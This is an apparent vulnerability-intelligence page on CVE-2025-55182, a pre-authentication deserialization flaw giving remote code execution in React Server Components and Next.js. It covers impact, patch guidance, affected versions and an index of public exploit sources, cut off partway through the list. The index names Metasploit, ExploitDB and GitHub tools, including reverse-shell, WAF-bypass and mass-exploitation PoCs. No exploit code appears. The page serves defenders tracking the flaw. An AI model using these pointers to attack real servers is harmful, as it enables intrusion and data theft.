CVE-2025-55182
Overview
This vulnerability is a remote code execution flaw caused by unsafe deserialization of untrusted data. The root cause lies in the React Server Components feature, specifically in versions 19.0.0 through 19.2.0 and related packages such as react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The affected component improperly processes payloads received via HTTP requests to Server Function endpoints, leading to execution of malicious code without authentication.
Vulnerability Description
A pre-authentication remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints.
Impact
An unauthenticated attacker can remotely execute arbitrary code on affected systems by exploiting this vulnerability, potentially gaining full system control. No user interaction or credentials are required to exploit the flaw, making it highly accessible. Successful exploitation can lead to complete compromise of the underlying server environment, exposing sensitive data, allowing lateral movement, and disrupting service availability.
Solution
Upgrade React Server Components to versions later than 19.2.0 as specified in the official Facebook security advisory. Follow detailed patch instructions available at https://www.facebook.com/security/advisories/cve-2025-55182 and https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components. Ensure all related packages including react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack are updated accordingly to mitigate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical pre-authentication remote code execution vulnerability has been identified in specific versions of React Server Components, including associated packages such as react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The core issue arises from the unsafe deserialization of payloads received from HTTP requests directed at Server Function endpoints. This flaw allows an attacker to manipulate the input data in such a way that they can execute arbitrary code on the server, leading to severe consequences for any application utilizing these components.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a malicious HTTP request that targets the vulnerable Server Function endpoints, sending specially formatted payloads that the server would then deserialize without proper validation. This could lead to the execution of arbitrary code, allowing the attacker to gain control over the server environment. Scenarios may include injecting malicious scripts that could alter application behavior, exfiltrate sensitive data, or even pivot to other systems within the network. Given the nature of the vulnerability, it is particularly concerning for applications that rely heavily on server-side rendering and dynamic content generation.
The real-world impact of this vulnerability is substantial, particularly for businesses that depend on the affected versions of React and Next.js for their web applications. The potential for remote code execution means that an attacker could compromise the integrity and confidentiality of the application, leading to data breaches, loss of customer trust, and significant financial repercussions. Organizations may face regulatory scrutiny and legal liabilities if sensitive user data is exposed or if the integrity of their systems is compromised. Additionally, the reputational damage resulting from such incidents can have long-lasting effects on customer relationships and brand perception.
To address this vulnerability, organizations should implement robust detection and mitigation strategies. Regularly updating to the latest, patched versions of the affected software is critical, as it ensures that known vulnerabilities are resolved. Employing web application firewalls (WAFs) can help filter out malicious requests before they reach the server, providing an additional layer of security. Furthermore, implementing strict input validation and sanitization practices can mitigate the risk of deserialization attacks. Continuous monitoring of application logs for unusual activity can also aid in early detection of potential exploitation attempts, allowing for a swift response to any incidents.
In conclusion, the identified vulnerability poses a significant threat to applications utilizing the affected versions of React Server Components and related packages. The potential for remote code execution through unsafe deserialization highlights the importance of secure coding practices and the need for organizations to remain vigilant in their security posture. By adopting comprehensive detection and mitigation strategies, businesses can protect themselves against the risks associated with this vulnerability and safeguard their applications from malicious actors.
CSURFACE threat intelligence has detected a discernible increase in exploitation attempts targeting CVE-2025-55182, accompanied by the publication of a new ExploitDB entry and the emergence of additional proof-of-concept tools on public repositories. This expansion of the exploit landscape signals growing adversary interest and capability to weaponize the vulnerability, particularly given its critical severity and pre-authentication remote code execution vector. Our telemetry reveals a steady upward trend in detection events, reflecting both heightened scanning activity and potentially successful intrusion attempts. The elevated EPSS score, now approaching the highest percentiles, underscores the accelerating likelihood of exploitation in the wild. Notably, ransomware groups have been linked to leveraging this vulnerability, amplifying the operational risk for organizations running affected React Server Components versions. Collectively, these developments elevate the threat level from high to critical, necessitating increased vigilance in monitoring and incident response efforts despite existing mitigations.
Affected Products (82)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
React | 19.0.0 |
cpe:2.3:a:facebook:react:19.0.0:*:*:*:*:*:*:*
|
|
|
|
React | 19.1.0 |
cpe:2.3:a:facebook:react:19.1.0:*:*:*:*:*:*:*
|
|
|
|
React | 19.1.1 |
cpe:2.3:a:facebook:react:19.1.1:*:*:*:*:*:*:*
|
|
|
|
React | 19.2.0 |
cpe:2.3:a:facebook:react:19.2.0:*:*:*:*:*:*:*
|
|
|
|
Vercel | Next.js | All |
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*
|
|
|
Vercel | Next.js | All |
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*
|
|
|
Vercel | Next.js | All |
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*
|
|
|
Vercel | Next.js | All |
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*
|
|
|
Vercel | Next.js | All |
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*
|
|
|
Vercel | Next.js | All |
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*
|
|
|
Vercel | Next.js | All |
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*
|
|
|
Vercel | Next.js | 14.3.0 |
cpe:2.3:a:vercel:next.js:14.3.0:canary77:*:*:*:node.js:*:*
|
|
|
Vercel | Next.js | 14.3.0 |
cpe:2.3:a:vercel:next.js:14.3.0:canary78:*:*:*:node.js:*:*
|
|
|
Vercel | Next.js | 14.3.0 |
cpe:2.3:a:vercel:next.js:14.3.0:canary79:*:*:*:node.js:*:*
|
|
|
Vercel | Next.js | 14.3.0 |
cpe:2.3:a:vercel:next.js:14.3.0:canary80:*:*:*:node.js:*:*
|
|
|
Vercel | Next.js | 14.3.0 |
cpe:2.3:a:vercel:next.js:14.3.0:canary81:*:*:*:node.js:*:*
|
|
|
Vercel | Next.js | 14.3.0 |
cpe:2.3:a:vercel:next.js:14.3.0:canary82:*:*:*:node.js:*:*
|
|
|
Vercel | Next.js | 14.3.0 |
cpe:2.3:a:vercel:next.js:14.3.0:canary83:*:*:*:node.js:*:*
|
|
|
Vercel | Next.js | 14.3.0 |
cpe:2.3:a:vercel:next.js:14.3.0:canary84:*:*:*:node.js:*:*
|
|
|
Vercel | Next.js | 14.3.0 |
cpe:2.3:a:vercel:next.js:14.3.0:canary85:*:*:*:node.js:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Unauthenticated RCE in React Server Components (React2Shell)
exploits/multi/http/react2shell_unauth_rce_cve_2025_55182
|
Maksim Rogov | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| React Server 19.2.0 - Remote Code Execution | danieljavanrad | webapps | multiple | - | View |
GitHub PoCs (497)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
assetnote/react2shell-scanner
High Fidelity Detection Mechanism for RSC/Next.js RCE (CVE-2025-55182 & CVE-2025-66478)
|
assetnote | 2451 | 269 | 2025-12-04 | View |
|
msanft/CVE-2025-55182
Explanation and full RCE PoC for CVE-2025-55182
|
msanft | 1426 | 198 | 2025-12-04 | View |
|
lachlan2k/React2Shell-CVE-2025-55182-original-poc
Original Proof-of-Concepts for React2Shell CVE-2025-55182
|
lachlan2k | 1052 | 108 | 2025-12-05 | View |
|
ejpir/CVE-2025-55182-research
CVE-2025-55182 POC
|
ejpir | 796 | 206 | 2025-12-03 | View |
|
mrknow001/RSC_Detector
Supports RSC fingerprinting and exploitation of the React component vulnerability CVE-2025-55182.
|
mrknow001 | 578 | 86 | 2025-12-05 | View |
|
emredavut/CVE-2025-55182
RSC/Next.js RCE Vulnerability Detector & PoC Chrome Extension – CVE-2025-55182 & CVE-2025-66478
|
emredavut | 313 | 57 | 2025-12-06 | View |
|
zack0x01/CVE-2025-55182-advanced-scanner-
|
zack0x01 | 278 | 48 | 2025-12-06 | View |
|
ynsmroztas/NextRce
React Shell & Next.js RSC Exploit Tool (CVE-2025-55182)
|
ynsmroztas | 251 | 58 | 2025-12-06 | View |
|
alptexans/RSC-Detect-CVE-2025-55182
RSC Detect CVE 2025 55182
|
alptexans | 190 | 44 | 2026-02-25 | View |
|
pyroxenites/Nextjs_RCE_Exploit_Tool
Exploit for CVE-2025-55182 & CVE-2025-66478
|
pyroxenites | 140 | 35 | 2025-12-05 | View |
|
fatguru/CVE-2025-55182-scanner
A non-intrusive surface scanner for CVE-2025-55182 (React Server Components RCE). Detects exposed RSC endpoints in React...
|
fatguru | 111 | 18 | 2025-12-03 | View |
|
Rsatan/Next.js-Exploit-Tool
Next.js-Exploit-Tool 图形化综合利用工具,基于 Go 开发,一款针对 CVE-2025-55182 的独立安全评估工具。
|
Rsatan | 117 | 12 | 2025-12-04 | View |
|
whiteov3rflow/CVE-2025-55182-poc
React2Shell Proof of Concept
|
whiteov3rflow | 91 | 33 | 2025-12-04 | View |
|
BeichenDream/CVE-2025-55182-GodzillaMemoryShell
|
BeichenDream | 108 | 10 | 2025-12-10 | View |
|
l4rm4nd/CVE-2025-55182
Docker poc lab for CVE-2025-55182 / CVE-2025-66478 (React2Shell) detection and exploitation
|
l4rm4nd | 85 | 27 | 2025-12-05 | View |
|
freeqaz/react2shell
An analysis of CVE-2025-55182 and CVE-2025-66478 -- the vulnerabilities behind React2Shell. Tools, technical information...
|
freeqaz | 66 | 18 | 2025-12-05 | View |
|
Chocapikk/CVE-2025-55182
Next.js React Server Components RCE exploit for CVE-2025-55182
|
Chocapikk | 67 | 15 | 2025-12-05 | View |
|
dwisiswant0/CVE-2025-55182
Pre-auth RCE in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0.
|
dwisiswant0 | 59 | 15 | 2025-12-04 | View |
|
gensecaihq/react2shell-scanner
Security scanner for CVE-2025-55182 - Critical RCE vulnerability in React Server Components. Scan npm/pnpm/yarn lockf...
|
gensecaihq | 58 | 7 | 2025-12-04 | View |
|
Spritualkb/CVE-2025-55182-exp
CVE-2025-55182 React Server Components Remote Code Execution Exploit Tool
|
Spritualkb | 45 | 12 | 2025-12-05 | View |
|
xalgord/React2Shell
Advanced Exploitation Toolkit for Next.js Server Actions (CVE-2025-55182)
|
xalgord | 46 | 5 | 2025-12-12 | View |
|
sumanrox/rschunter
Mass Hunting & Exploitation PoC for CVE-2025-55182 & CVE-2025-66478
|
sumanrox | 36 | 10 | 2025-12-06 | View |
|
kavienanj/CVE-2025-55182
Step-by-step walkthrough of CVE-2025-55182 (React2Shell) by tracing React's Flight protocol internals.
|
kavienanj | 38 | 1 | 2025-12-07 | View |
|
surajhacx/react2shellpoc
react2shell CVE-2025-55182 PoC
|
surajhacx | 29 | 9 | 2025-12-07 | View |
|
MoLeft/React2Shell-Toolbox
A CVE-2025-55182(React2Shell) Toolbox Application
|
MoLeft | 35 | 0 | 2025-12-13 | View |
|
RuoJi6/CVE-2025-55182-RCE-shell
Burp Suite/antsword - Interactive shell (HTTP hijack + POST + AES-256-CBC/BASE64)
|
RuoJi6 | 31 | 4 | 2025-12-05 | View |
|
momika233/CVE-2025-55182-bypass
CVE-2025-55182-bypass-waf
|
momika233 | 30 | 4 | 2026-01-08 | View |
|
ThemeHackers/CVE-2025-55182
a critical Remote Code Execution (RCE) vulnerability in React Server Components (RSC). It also includes a realistic "Lab...
|
ThemeHackers | 22 | 9 | 2025-12-04 | View |
|
vijay-shirhatti/RSC-Detect-CVE-2025-55182
RSC Detect CVE 2025 55182
|
vijay-shirhatti | 21 | 9 | 2025-12-20 | View |
|
shen771/Blackash-CVE-2025-55182
CVE-2025-55182
|
shen771 | 0 | 30 | 2025-12-04 | View |
|
aliclub0x00/CVE-2025-55182-POC-NEXTJS
Working proof of concept for NextJS RCE to establish a reverse shell. [React2Shell]
|
aliclub0x00 | 29 | 0 | 2025-12-05 | View |
|
tobiasGuta/Next.js-RSC-RCE-Scanner-Burp-Suite-Extension
Burp Suite extension to detect the Next.js / React Server Components (RSC) Remote Code Execution vulnerability (CVE-2025...
|
tobiasGuta | 24 | 4 | 2025-12-04 | View |
|
Cr4at0r/Next.js-RCE-Scanner-BurpSuite-Extension-
使用burp自动检测CVE-2025-55182 Next.js RCE 漏洞
|
Cr4at0r | 26 | 1 | 2025-12-05 | View |
|
zack0x01/vuln-app-CVE-2025-55182
|
zack0x01 | 17 | 8 | 2025-12-06 | View |
|
cybertechajju/R2C-CVE-2025-55182-66478
🔥 React2Shell Toolkit - CVE-2025-55182 & CVE-2025-66478
|
cybertechajju | 24 | 0 | 2025-12-07 | View |
|
MrR0b0t19/CVE-2025-55182-shellinteractive
|
MrR0b0t19 | 21 | 3 | 2025-12-04 | View |
|
theori-io/reactguard
ReactGuard provides framework- and vulnerability-detection tooling for CVE-2025-55182 (React2Shell)
|
theori-io | 18 | 4 | 2025-12-10 | View |
|
sickwell/CVE-2025-55182
CVE-2025-55182 - React Server Components RCE Exploit & Scanner Supports external servers and CLI interface
|
sickwell | 13 | 7 | 2025-12-03 | View |
|
BankkRoll/Quickcheck-CVE-2025-55182-React-and-CVE-2025-66478-Next.js
Script to quick check CVE-2025-55182 (React) and CVE-2025-66478 (Next.js) - Critical unauthenticated RCE vulnerabilitie...
|
BankkRoll | 11 | 6 | 2025-12-03 | View |
|
AliHzSec/CVE-2025-55182
Critical RCE vulnerability scanner for React Server Components (CVE-2025-55182). Automated exploitation framework with m...
|
AliHzSec | 15 | 1 | 2025-12-07 | View |
|
kOaDT/poc-cve-2025-55182
This repository contains a POC of CVE-2025-55182, a critical (CVSS score 10.0) pre-authentication remote code execution ...
|
kOaDT | 13 | 3 | 2025-12-05 | View |
|
xcanwin/CVE-2025-55182-React-RCE
[漏洞复现] 全球首款基于RSC特性能绕过WAF检测的CVE-2025-55182 React Server RCE 漏洞 EXP。
|
xcanwin | 15 | 0 | 2025-12-07 | View |
|
shyambhanushali/React2Shell
React2Shell is a Python-based proof-of-concept tool designed to exploit CVE-2025-55182 and CVE-2025-66478, both impactin...
|
shyambhanushali | 13 | 2 | 2025-12-09 | View |
|
BlackTechX011/React2Shell
React2Shell: An exploitation framework for CVE-2025-55182 (Next.js/React RCE).
|
BlackTechX011 | 11 | 2 | 2025-12-22 | View |
|
zr0n/react2shell
A complete framework for exploiting the vulnerability CVE-2025-55182
|
zr0n | 9 | 4 | 2025-12-07 | View |
|
shamo0/react2shell-PoC
Nuclei template for detecting react2shell (CVE-2025-55182 & CVE-2025-66478)
|
shamo0 | 10 | 3 | 2025-12-04 | View |
|
acheong08/CVE-2025-55182-poc
Actual CVE-2025-55182 detection and exploit. No bullshit LLMs.
|
acheong08 | 9 | 1 | 2025-12-04 | View |
|
sho-luv/React2Shell
CVE-2025-55182 security test kit: CLI scanner + Chrome extension + Nuclei templates + Docker lab.
|
sho-luv | 8 | 2 | 2025-12-12 | View |
|
pax-k/react2shell-CVE-2025-55182-full-rce-script
React2Shell vulnerability (CVE-2025-55182 / CVE-2025-66478)
|
pax-k | 6 | 4 | 2025-12-05 | View |
|
GelukCrab/React-Server-Components-RCE
React Server Components 远程代码执行漏洞(CVE-2025-55182)
|
GelukCrab | 9 | 0 | 2025-12-05 | View |
|
im-ezboy/CVE-2025-55182-zoomeye
🔍 Next.js RCE Scanner (CVE-2025-55182) - Automated vulnerability scanner using Zoomeye search engine. Discovers targets ...
|
im-ezboy | 7 | 2 | 2025-12-08 | View |
|
jctommasi/react2shellVulnApp
Deliberately vulnerable banking app for CVE-2025-55182 (React) and CVE-2025-66478 (Next.js) to learn, detect, and safely...
|
jctommasi | 7 | 2 | 2025-12-04 | View |
|
zzhorc/CVE-2025-55182
CVE-2025-55182复现环境及RCE回显poc
|
zzhorc | 7 | 2 | 2025-12-05 | View |
|
p3ta00/react2shell-poc
CVE-2025-55182 React2Shell PoC - Critical RCE in React Server Components / Next.js. CVSS 10.0. Error-based exfil, revers...
|
p3ta00 | 8 | 1 | 2025-12-20 | View |
|
Security-Phoenix-demo/react2shell-scanner-rce-react-next-CVE-2025-55182-CVE-2025-66478
Scanner for CVE-2025-55182 (React) and CVE-2025-66478 (Next.js) - Track and remediate a critical React Server Components...
|
Security-Phoenix-demo | 6 | 3 | 2025-12-04 | View |
|
ejpir/CVE-2025-55182-bypass
Header bypass for CVE-2025-55182 (React Server Components RCE).
|
ejpir | 6 | 3 | 2025-12-05 | View |
|
M4xSec/CVE-2025-55182-React2Shell-RCE-Shell
CVE-2025-55182 – React2Shell: Proof-of-Concept Remote Code Execution (RCE) exploit for Next.js apps. Features an interac...
|
M4xSec | 8 | 1 | 2025-12-07 | View |
|
websecuritylabs/React2Shell-Library
A curated list of resources regarding CVE-2025-55182, the critical Remote Code Execution (RCE) vulnerability in React Se...
|
websecuritylabs | 7 | 2 | 2025-12-07 | View |
|
Pizz33/CVE-2025-55182-burpscanner
基于 CVE-2025-55182 漏洞检测 burpsuite 被动扫描插件
|
Pizz33 | 8 | 0 | 2025-12-05 | View |
|
StealthMoud/CVE-2025-55182-Scanner
|
StealthMoud | 8 | 0 | 2025-12-05 | View |
|
AdityaBhatt3010/React2Shell-CVE-2025-55182-The-Deserialization-Bug-That-Broke-the-Web
React2Shell, CVE-2025-55182, RCE Vulnerability: A critical breakdown of the unsafe deserialization flaw in React Server ...
|
AdityaBhatt3010 | 8 | 0 | 2025-12-06 | View |
|
jensnesten/React2Shell-PoC
RCE exploit PoC for CVE-2025-55182 and CVE-2025-66478 in Next.js and React Server Components with scanner and exploitati...
|
jensnesten | 6 | 2 | 2025-12-23 | View |
|
atastycookie/CVE-2025-55182
CVE-2025-55182 - React Server Components RCE Exploit & Scanner Supports external servers and CLI interface
|
atastycookie | 0 | 8 | 2025-12-03 | View |
|
heiheishushu/rsc_detect_CVE-2025-55182
For CVE-2025-55182 and CVE-2025-66478 Security Response
|
heiheishushu | 7 | 1 | 2025-12-04 | View |
|
nehkark/CVE-2025-55182
PoC: CVE-2025-55182 (React) and CVE-2025-66478 (Next.js)
|
nehkark | 7 | 0 | 2025-12-05 | View |
|
alsaut1/react2shell-lab
CVE-2025-55182 React2Shell PoC lab
|
alsaut1 | 7 | 0 | 2025-12-05 | View |
|
AdityaBhatt3010/React2Shell-CVE-2025-55182
React2Shell CVE-2025-55182: unauthenticated unsafe deserialization in React Server Components leading to reliable remote...
|
AdityaBhatt3010 | 7 | 0 | 2026-01-04 | View |
|
keklick1337/CVE-2025-55182-golang-PoC
CVE-2025-55182 React Server Components RCE - Go PoC
|
keklick1337 | 6 | 1 | 2025-12-06 | View |
|
rix4uni/CVE-2025-55182
A command-line tool for detecting CVE-2025-55182 and CVE-2025-66478 in Next.js applications using React Server Component...
|
rix4uni | 6 | 1 | 2025-12-10 | View |
|
EynaExp/CVE-2025-55182-POC
Poc for CVE-2025-55182 (remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 1...
|
EynaExp | 6 | 1 | 2025-12-04 | View |
|
Jenderal92/CVE-2025-55182-React2shell
CVE-2025-55182 Exploit Tool – Python 2.7 exploit for Next.js prototype pollution leading to RCE
|
Jenderal92 | 5 | 1 | 2026-05-25 | View |
|
TheStingR/ReactOOPS-WriteUp
Hack The Box Writeup for Retired Challenge ReactOOPS - Complete solution and educational guide to CVE-2025-55182/CVE-202...
|
TheStingR | 6 | 0 | 2025-12-13 | View |
|
AsadAhmad-1337/React-2-Shell
This is a security exploit tool targeting CVE-2025-55182. It exploits a Remote Code Execution (RCE) vulnerability in Rea...
|
AsadAhmad-1337 | 6 | 0 | 2026-01-27 | View |
|
kondukto-io/vulnerable-next-js-poc
POC for React2Shell (CVE-2025-55182)
|
kondukto-io | 5 | 1 | 2025-12-09 | View |
|
RavinduRathnayaka/CVE-2025-55182-PoC
React2Shell (CVE-2025-66478): A Python-based Proof of Concept for Critical Remote Code Execution (RCE) in Next.js Server...
|
RavinduRathnayaka | 4 | 2 | 2025-12-18 | View |
|
chrahman/react2shell-CVE-2025-55182-full-rce-script
React2Shell vulnerability (CVE-2025-55182 / CVE-2025-66478) Full Script
|
chrahman | 3 | 3 | 2025-12-19 | View |
|
songsanggggg/CVE-2025-55182
CVE-2025-55182 漏洞利用GUI,PoC / Exploit for CVE-2025-55182 & CVE-2025-66478
|
songsanggggg | 1 | 5 | 2025-12-04 | View |
|
raivenLockdown/WEB-CLI_RCE_React2Shell
WEB-CLI_RCE_React2Shell is an educational PoC exploit tool for CVE-2025-55182, a critical Prototype Pollution flaw in Ne...
|
raivenLockdown | 5 | 0 | 2025-12-12 | View |
|
ZihxS/check-react-rce-cve-2025-55182
Security scanner to detect CVE-2025-55182 & CVE-2025-66478 vulnerabilities in React Server Components (RSC) projects
|
ZihxS | 5 | 0 | 2025-12-05 | View |
|
CirqueiraDev/MassExploit-CVE-2025-55182
CVE-2025-55182 RCE - Massive Scanner POC
|
CirqueiraDev | 5 | 0 | 2025-12-06 | View |
|
Tiger-Foxx/exploit-react-CVE-2025-55182
This tool is a Proof of Concept (PoC) intended for security research and educational purposes only. Using this tool on s...
|
Tiger-Foxx | 5 | 0 | 2025-12-11 | View |
|
hidden-investigations/react2shell-scanner
Precision-Based Detection of RSC/Next.js Remote Code Execution Vulnerabilities (CVE-2025-55182, CVE-2025-66478)
|
hidden-investigations | 5 | 0 | 2025-12-14 | View |
|
rubensuxo-eh/react2shell-exploit
React2Shell-Exploit — Complete exploitation framework for CVE-2025-55182, including Python exploit, Docker vulnerable la...
|
rubensuxo-eh | 4 | 1 | 2025-12-06 | View |
|
Updatelap/CVE-2025-55182
React2Shell Scanner
|
Updatelap | 4 | 1 | 2025-12-26 | View |
|
MuhammadWaseem29/React2Shell_Rce-cve-2025-55182
React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0, including react-server-dom-parcel, react-server-dom...
|
MuhammadWaseem29 | 3 | 2 | 2025-12-06 | View |
|
ToritoIO/Torito-R2S
Torito React2Shell Scanner & Exploit Tool (CVE-2025-55182 / 66478)
|
ToritoIO | 4 | 1 | 2025-12-07 | View |
|
timsonner/React2Shell-CVE-2025-55182
POC and lab setup
|
timsonner | 3 | 2 | 2025-12-08 | View |
|
yz9yt/React2Shell-CTF
A CTF challenge based on CVE-2025-55182 Vulnerability
|
yz9yt | 3 | 2 | 2025-12-10 | View |
|
raivenLockdown/RCE_React2Shell_ButCooler-SomeUselessUsefulThingsLMAO-
simple Proof-of-Concept (PoC) exploit for CVE-2025-55182
|
raivenLockdown | 4 | 0 | 2025-12-12 | View |
|
xkillbit/cve-2025-55182-scanner
|
xkillbit | 4 | 0 | 2025-12-04 | View |
|
c0rydoras/CVE-2025-55182
some notes && (somewhat?) poc-adjacent stuff for CVE-2025-55182
|
c0rydoras | 4 | 0 | 2025-12-04 | View |
|
hualy13/CVE-2025-55182
|
hualy13 | 4 | 0 | 2025-12-05 | View |
|
grp-ops/react2shell
Lightweight scanner and Nuclei templates for identifying React and Next.js deserialization RCEs (CVE-2025-55182 / CVE-20...
|
grp-ops | 4 | 0 | 2025-12-05 | View |
|
yanoshercohen/React2Shell_CVE-2025-55182
React2Shell (CVE-2025-55182) Exploit
|
yanoshercohen | 4 | 0 | 2025-12-05 | View |
|
LemonTeatw1/CVE-2025-55182-exploit
This is CVE-2025-55182 exploit
|
LemonTeatw1 | 4 | 0 | 2025-12-07 | View |
|
alfazhossain/CVE-2025-55182-Exploiter
CVE-2025-55182-Exploiter Google Chrome Extension. nextjs vulnerability #nextjscve
|
alfazhossain | 4 | 0 | 2025-12-09 | View |
|
pkrasulia/CVE-2025-55182-NextJS-RCE-PoC
Working Proof of Concept (PoC) for CVE-2025-55182 (React2Shell) - Unauthenticated Remote Code Execution in Next.js 15.0....
|
pkrasulia | 4 | 0 | 2025-12-10 | View |
|
M0onPu15e/next.js-scanner
检测针对 CVE-2025-55182(React 服务器组件远程代码执行漏洞)的扫描器
|
M0onPu15e | 3 | 1 | 2025-12-04 | View |
|
Cillian-Collins/CVE-2025-55182
A proof of concept exploit script for CVE-2025-55182
|
Cillian-Collins | 3 | 1 | 2025-12-04 | View |
|
Rat5ak/CVE-2025-55182-React2Shell-RCE-POC
This repository documents research into deserialization behavior within Next.js React Server Components (RSC) using the ...
|
Rat5ak | 3 | 1 | 2025-12-05 | View |
|
Dh4v4l8/CVE-2025-55182-poc-tool
|
Dh4v4l8 | 3 | 1 | 2025-12-07 | View |
|
xiaopeng-ye/react2shell-detector
A Chrome extension for detecting React2Shell vulnerabilities (CVE-2025-55182 & CVE-2025-66478) in web applications
|
xiaopeng-ye | 3 | 1 | 2025-12-08 | View |
|
anuththara2007-W/CVE-2025-55182-Exploit-extension
A Chrome extension for detecting React2Shell vulnerabilities (CVE-2025-55182 & CVE-2025-66478) in web applications
|
anuththara2007-W | 3 | 1 | 2025-12-11 | View |
|
fullhunt/react2shell-test-server
A test server for demonstrating and testing React2Shell (CVE-2025-55182) vulnerability
|
fullhunt | 2 | 2 | 2025-12-06 | View |
|
snipevx/React2Shell-POC
React2Shell (CVE-2025-55182) POC
|
snipevx | 2 | 2 | 2026-02-12 | View |
|
santihabib/CVE-2025-55182-analysis
|
santihabib | 4 | 0 | 2025-12-03 | View |
|
olezhaku/react2shell-toolkit
Toolkit for CVE-2025-55182, also known as React2Shell.
|
olezhaku | 3 | 0 | 2026-06-12 | View |
|
hexsh1dow/CVE-2025-55182
Interactive RCE exploitation tool for CVE-2025-55182 (React Server Components)
|
hexsh1dow | 3 | 0 | 2026-04-06 | View |
|
IrsyadSEC/CVE-2025-55182-MassPayloadAttack
CVE-2025-55182 payload
|
IrsyadSEC | 1 | 2 | 2025-12-12 | View |
|
jf0x3a/CVE-2025-55182-exploit
RCE Auto exploit for CVE-2025-55182
|
jf0x3a | 3 | 0 | 2025-12-04 | View |
|
ihhgimhana/React2Shell-CVE-2025-55182-PoC-Reverse-Shell
This is an easy to use PoC script to exploit React2Shell-CVE-2025-55182 Nextjs vulnerability. This will help to gain a r...
|
ihhgimhana | 3 | 0 | 2025-12-07 | View |
|
Syrins/CVE-2025-55182-React2Shell-RCE
A modern, user-friendly GUI application for detecting and exploiting the CVE-2025-55182 vulnerability in React Server Co...
|
Syrins | 3 | 0 | 2025-12-08 | View |
|
techgaun/cve-2025-55182-scanner
|
techgaun | 3 | 0 | 2025-12-09 | View |
|
VeilVulp/RscScan-cve-2025-55182
RscScan: Professional cross-platform vulnerability scanner for Next.js Server Actions (CVE-2025-55182). Detects critical...
|
VeilVulp | 3 | 0 | 2025-12-10 | View |
|
VolksRat71/react2shellexploitvisualized
Interactive visualization of the React2Shell (CVE-2025-55182) RCE vulnerability with narrated animations for three audie...
|
VolksRat71 | 3 | 0 | 2025-12-11 | View |
|
TrixSec/CVE-2025-55182-Scanner
A hybrid security scanner for detecting CVE-2025-55182 in Next.js and Waku applications. Features combined static code a...
|
TrixSec | 3 | 0 | 2025-12-13 | View |
|
hidden-investigations/react2shell-vulnlab
A modern Next.js vulnerable web app themed as a news / blog portal for CVE-2025-55182 (React) and CVE-2025-66478 (Next.j...
|
hidden-investigations | 3 | 0 | 2025-12-13 | View |
|
MammaniNelsonD/React2P4IM0Nshell
💥Extension Tool para Auditoría y Explotación avanzada RCE/Source Leak/Dos (CVE-2025-55182/83/84) para entornos Next.js y...
|
MammaniNelsonD | 3 | 0 | 2025-12-14 | View |
|
nxgn-kd01/react2shell-scanner
Detect CVE-2025-55182 (React2Shell) RCE vulnerability in React Server Components. Fast, accurate scanner with zero false...
|
nxgn-kd01 | 3 | 0 | 2025-12-04 | View |
|
ZemarKhos/CVE-2025-55182-Exploit-PoC-Scanner
|
ZemarKhos | 2 | 1 | 2025-12-05 | View |
|
l0n3m4n/CVE-2025-55182-Waf
CVE-2025-55182 RCE vulnerability in Next.js/React RSC servers (exploit and scanner)
|
l0n3m4n | 2 | 1 | 2025-12-06 | View |
|
guiimoraes/react2shell-evolved
A evolved version of assetnote CVE-2025-55182 scanner
|
guiimoraes | 2 | 1 | 2025-12-24 | View |
|
InferiorAK/CVE-2025-55182-React2Shell-Async-Scanner
Async RCE scanner for CVE-2025-55182 / CVE-2025-66478 — prototype-pollution → code execution via React Server Actions.
|
InferiorAK | 2 | 1 | 2026-02-28 | View |
|
alessiodos/react2shell-scanner
CVE-2025-55182 & CVE-2025-66478 Detection Tool for Next.js RSC RCE
|
alessiodos | 1 | 2 | 2025-12-06 | View |
|
hoosin/CVE-2025-55182
|
hoosin | 3 | 0 | 2025-12-05 | View |
|
AggressiveUser/React2Hell
[React2Hell] Next.js/React Server RCE Exploit — CVE-2025-55182
|
AggressiveUser | 3 | 0 | 2025-12-08 | View |
|
cyberleelawat/CVE-2025-55182
A critical Remote Code Execution (RCE) vulnerability affecting the React Server Components (RSC) implementation within m...
|
cyberleelawat | 1 | 1 | 2025-12-07 | View |
|
kk12-30/CVE-2025-55182
CVE-2025-55182
|
kk12-30 | 1 | 1 | 2025-12-04 | View |
|
oscarmine/R2SAE
Firefox extension to detect and exploit CVE-2025-55182 - Prototype Pollution RCE in Next.js React Server Actions
|
oscarmine | 2 | 0 | 2025-12-10 | View |
|
sudo-Yangziran/CVE-2025-55182POC
|
sudo-Yangziran | 2 | 0 | 2025-12-04 | View |
|
oways/React2shell-CVE-2025-55182-checker
|
oways | 2 | 0 | 2025-12-04 | View |
|
CymulateResearch/React2Shell-Scanner
